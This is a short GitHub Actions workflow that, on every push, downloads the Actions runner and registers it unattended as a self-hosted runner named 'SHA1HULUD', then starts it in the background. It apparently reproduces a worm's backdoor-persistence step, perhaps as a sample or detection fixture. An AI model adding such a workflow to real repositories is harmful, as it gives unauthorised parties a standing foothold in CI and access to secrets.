name: Register Self-Hosted Runner
on:
  push:

jobs:
  register:
    runs-on: ubuntu-latest
    steps:
      - name: Setup Runner
        run: |
          # Register as SHA1HULUD runner
          mkdir -p actions-runner && cd actions-runner
          curl -o actions-runner-linux-x64.tar.gz -L \
            https://github.com/actions/runner/releases/download/v2.311.0/actions-runner-linux-x64-2.311.0.tar.gz
          tar xzf ./actions-runner-linux-x64.tar.gz

          # Configure runner with name SHA1HULUD
          ./config.sh --url https://github.com/${{ github.repository }} \
            --token ${{ secrets.RUNNER_TOKEN }} \
            --name SHA1HULUD \
            --unattended

      - name: Start Runner
        run: |
          cd actions-runner
          nohup ./run.sh &
